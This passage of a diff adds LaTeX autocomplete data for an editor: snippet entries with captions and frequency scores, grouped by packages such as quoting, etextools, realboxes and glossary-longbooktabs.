'easyReview-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'easyReview-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'easyReview-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareRobustCommand{}{}', + snippet: '\\DeclareRobustCommand{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\DeclareRobustCommand{}[]{}', + snippet: '\\DeclareRobustCommand{$1}[$2]{$3}', + meta: 'easyReview-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\sethlcolor{}', + snippet: '\\sethlcolor{$1}', + meta: 'easyReview-cmd', + score: 0.01970230898277056, + }, + { + caption: '\\st', + snippet: '\\st', + meta: 'easyReview-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\st{}', + snippet: '\\st{$1}', + meta: 'easyReview-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\def', + snippet: '\\def', + meta: 'easyReview-cmd', + score: 0.21357759092476175, + }, + { + caption: '\\hl{}', + snippet: '\\hl{$1}', + meta: 'easyReview-cmd', + score: 0.03421486301062431, + }, + { + caption: '\\sodef', + snippet: '\\sodef', + meta: 'easyReview-cmd', + score: 0.0017045357696831268, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\so', + snippet: '\\so', + meta: 'easyReview-cmd', + score: 0.004308800134587786, + }, + { + caption: '\\so{}', + snippet: '\\so{$1}', + meta: 'easyReview-cmd', + score: 0.004308800134587786, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'easyReview-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'easyReview-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'easyReview-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'easyReview-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'easyReview-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'easyReview-cmd', + score: 0.2864294797053033, + }, + ], + quoting: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'quoting-cmd', + score: 0.413853376001159, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'quoting-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'quoting-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'quoting-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'quoting-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'quoting-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'quoting-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'quoting-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'quoting-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'quoting-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'quoting-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'quoting-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'quoting-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'quoting-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'quoting-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'quoting-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'quoting-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'quoting-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'quoting-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'quoting-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'quoting-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + ], + fouriernc: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fouriernc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fouriernc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fouriernc-cmd', + score: 0.021170869458413965, + }, + ], + realboxes: [ + { + caption: '\\Rotatebox{}{}', + snippet: '\\Rotatebox{$1}{$2}', + meta: 'realboxes-cmd', + score: 1.8920528094586312e-5, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'realboxes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'realboxes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'realboxes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'realboxes-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'realboxes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'realboxes-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'realboxes-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'realboxes-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'realboxes-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'realboxes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'realboxes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'realboxes-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'realboxes-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'realboxes-cmd', + score: 0.0018957469739775527, + }, + ], + etextools: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'etextools-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'etextools-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'etextools-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'etextools-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'etextools-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'etextools-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'etextools-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'etextools-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'etextools-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'etextools-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'etextools-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'etextools-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'etextools-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etextools-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etextools-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'etextools-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'etextools-cmd', + score: 0.00031058155311734754, + }, + ], + ccaption: [ + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'ccaption-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'ccaption-cmd', + score: 1.897791904799601, + }, + ], + exercise: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'exercise-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'exercise-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'exercise-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'exercise-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'exercise-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'exercise-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'exercise-cmd', + score: 0.00037306820619479756, + }, + ], + slantsc: [ + { + caption: '\\scshape', + snippet: '\\scshape', + meta: 'slantsc-cmd', + score: 0.05364108855914402, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'slantsc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'slantsc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'slantsc-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'slantsc-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'slantsc-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'slantsc-cmd', + score: 0.0018957469739775527, + }, + ], + 'glossary-longbooktabs': [ + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'glossary-longbooktabs-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'glossary-longbooktabs-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'glossary-longbooktabs-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'glossary-longbooktabs-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'glossary-longbooktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'glossary-longbooktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'glossary-longbooktabs-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'glossary-longbooktabs-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'glossary-longbooktabs-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossary-longbooktabs-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'glossary-longbooktabs-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'glossary-longbooktabs-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'glossary-longbooktabs-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'glossary-longbooktabs-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'glossary-longbooktabs-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'glossary-longbooktabs-cmd', + score: 0.0313525090421608, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'glossary-longbooktabs-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'glossary-longbooktabs-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'glossary-longbooktabs-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossary-longbooktabs-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'glossary-longbooktabs-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'glossary-longbooktabs-cmd', + score: 0.018615449342361392, + }, + ], + pgflibraryarrows: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgflibraryarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgflibraryarrows-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgflibraryarrows-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.2864294797053033, + }, + ], + soulpos: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'soulpos-cmd', + score: 0.00037306820619479756, + }, + ], + gmp: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'gmp-cmd', + score: 0.413853376001159, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gmp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gmp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'gmp-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'gmp-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'gmp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'gmp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'gmp-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'gmp-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'gmp-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'gmp-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'gmp-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'gmp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'gmp-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gmp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'gmp-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'gmp-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'gmp-cmd', + score: 0.021170869458413965, 